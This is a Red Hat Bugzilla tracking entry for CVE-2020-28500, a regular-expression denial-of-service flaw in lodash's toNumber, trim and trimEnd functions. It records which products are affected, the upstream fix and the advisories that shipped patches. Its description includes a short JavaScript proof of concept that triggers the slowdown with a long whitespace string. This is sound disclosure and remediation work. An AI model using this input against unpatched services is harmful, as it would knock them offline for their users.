Bug 1928954 (CVE-2020-28500) - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions
Summary: CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2020-28500
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1928956 1929028 1929029 1928955 1929027 1930135 1930136 1930137 1930154 1930155 1930156 1930157 1930158 1930159 1930160 1931277 1931278 1931279 1931280 1931281 1931282 1937751 1937752 1937753 1937955 1938267 1938268 1938269
Blocks: 1928940
TreeView+ depends on / blocked
 
Reported: 2021-02-15 20:53 UTC by Guilherme de Almeida Suckevicz
Modified: 2021-09-08 14:11 UTC (History)
50 users (show)

Fixed In Version: nodejs-lodash-4.17.21
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in nodejs-lodash. A Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions is possible.
Clone Of:
Environment:
Last Closed: 2021-04-13 06:39:06 UTC


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2021:2438 0 None None None 2021-07-27 22:31:55 UTC
Red Hat Product Errata RHSA-2021:2543 0 None None None 2021-06-24 15:20:30 UTC
Red Hat Product Errata RHSA-2021:3016 0 None None None 2021-08-06 00:50:14 UTC
Red Hat Product Errata RHSA-2021:3459 0 None None None 2021-09-08 14:11:23 UTC

Description Guilherme de Almeida Suckevicz 2021-02-15 20:53:24 UTC
All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2)

Reference:
https://snyk.io/vuln/SNYK-JS-LODASH-1018905

Comment 1 Guilherme de Almeida Suckevicz 2021-02-15 20:53:49 UTC
Created lodash tracking bugs for this issue:

Affects: fedora-32 [bug 1928955]


Created nodejs-lodash tracking bugs for this issue:

Affects: epel-all [bug 1928956]

Comment 2 Jason Shepherd 2021-02-16 00:21:46 UTC
While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions.

Comment 5 Mark Cooper 2021-02-17 00:20:21 UTC
Upstream fix: https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7 [not merged as of yet]

Comment 18 Stoyan Nikolov 2021-03-23 13:03:47 UTC
Statement:

In OpenShift ServiceMesh (OSSM) and Red Hat OpenShift Jaeger (RHOSJ) the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-lodash library to authenticated users only, therefore the impact is low.

While Red Hat Virtualization's cockpit-ovirt has a dependency on lodash it doesn't use the vulnerable toNumber, trim, or trimEnd functions.

While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions.

Comment 20 Tapas Jena 2021-04-05 06:26:52 UTC
Did the code review again and found that though it uses lodash, but Not just the vulnerable functions which cause the ReDOS.Hence, marking it as "Not Affected".

Comment 21 errata-xmlrpc 2021-04-13 00:09:37 UTC
This issue has been addressed in the following products:

  Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 8
  Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 7

Via RHSA-2021:1168 https://access.redhat.com/errata/RHSA-2021:1168

Comment 22 Product Security DevOps Team 2021-04-13 06:39:06 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2020-28500

Comment 23 errata-xmlrpc 2021-06-01 13:22:09 UTC
This issue has been addressed in the following products:

  Red Hat Virtualization Engine 4.4

Via RHSA-2021:2179 https://access.redhat.com/errata/RHSA-2021:2179

Comment 24 errata-xmlrpc 2021-06-24 15:20:23 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Jaeger 1.20

Via RHSA-2021:2543 https://access.redhat.com/errata/RHSA-2021:2543

Comment 25 errata-xmlrpc 2021-07-27 22:31:56 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.8

Via RHSA-2021:2438 https://access.redhat.com/errata/RHSA-2021:2438

Comment 26 Jan Werner 2021-07-29 14:26:48 UTC
Updated the public data per @btarasso. The public date was incorrectly pointing to date when the vulnerability was disclosed to Snyk, not when it was fixed.

Comment 27 errata-xmlrpc 2021-08-06 00:50:10 UTC
This issue has been addressed in the following products:

  Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 7
  Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 8

Via RHSA-2021:3016 https://access.redhat.com/errata/RHSA-2021:3016

Comment 28 errata-xmlrpc 2021-09-08 14:11:20 UTC
This issue has been addressed in the following products:

  Red Hat Virtualization 4 for Red Hat Enterprise Linux 8

Via RHSA-2021:3459 https://access.redhat.com/errata/RHSA-2021:3459


Note You need to log in before you can comment on or make changes to this bug.